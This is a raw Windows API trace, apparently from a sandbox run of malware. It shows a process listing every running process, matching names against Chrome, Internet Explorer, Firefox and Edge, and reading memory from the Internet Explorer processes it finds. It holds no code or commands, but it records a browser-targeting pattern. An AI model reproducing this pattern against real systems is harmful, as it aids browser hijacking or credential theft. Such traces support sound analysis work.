	[0220.498] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.498] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0220.499] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x4ddc
	[0220.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.499] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0220.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.499] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.500] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0220.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.500] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.500] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.501] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x4de0
	[0220.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.501] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.501] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.502] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.502] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.502] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0220.503] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x4de4
	[0220.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.503] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0220.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.503] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.504] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0220.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.504] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.504] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0220.505] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x4de8
	[0220.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.505] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0220.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.505] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.506] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0220.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.506] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.506] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0220.507] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x4dec
	[0220.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.507] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0220.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.508] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.508] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0220.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.508] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.508] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0220.509] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x4df0
	[0220.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.509] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0220.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.509] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.510] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0220.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.510] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.510] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0220.511] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0220.511] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0220.512] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x4df4
	[0220.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.512] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0220.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.512] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.513] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0220.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.514] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.514] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0220.515] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4df8
	[0220.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.515] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0220.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.515] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.515] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0220.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.516] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.516] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0220.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x4dfc
	[0220.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.517] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0220.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.517] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.517] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0220.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.518] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.518] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0220.519] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x4e00
	[0220.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.519] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0220.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.519] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.519] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0220.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.520] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.520] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0220.521] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x4e04
	[0220.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.521] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0220.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.521] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.522] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0220.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.523] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.523] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0220.524] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x4e08
	[0220.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.524] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0220.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.524] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.525] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0220.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.525] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.525] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0220.526] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x4e0c
	[0220.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.526] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0220.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.527] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.527] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0220.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.527] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.528] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0220.528] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x4e10
	[0220.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.529] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0220.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.529] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.530] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0220.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.530] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.530] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0220.531] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x4e14
	[0220.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.531] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0220.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.531] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.532] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0220.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.532] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.532] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0220.533] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x4e18
	[0220.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.533] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0220.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.533] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.534] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0220.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.534] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.534] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0220.535] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x4e1c
	[0220.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.535] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0220.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.535] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.536] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0220.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.536] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.536] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0220.537] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x4e20
	[0220.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.537] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0220.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.538] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.539] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0220.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.540] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.540] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0220.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x4e24
	[0220.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.541] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0220.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.541] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.542] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0220.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.543] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.543] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0220.544] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x4e28
	[0220.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.544] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0220.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.544] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.545] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0220.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.546] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.546] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0220.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x4e2c
	[0220.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.547] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0220.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.548] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.548] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0220.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.549] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.549] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0220.550] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x4e30
	[0220.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.550] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0220.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.550] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0220.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.550] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0220.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.551] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.551] NtQueryInformationProcess (in: ProcessHandle=0x4e30, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0220.551] ReadProcessMemory (in: hProcess=0x4e30, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0220.551] ReadProcessMemory (in: hProcess=0x4e30, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0220.551] ReadProcessMemory (in: hProcess=0x4e30, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0220.551] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0220.551] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0220.552] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x4e34
	[0220.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.552] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0220.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.552] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0220.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.553] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0220.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.553] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.554] NtQueryInformationProcess (in: ProcessHandle=0x4e34, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
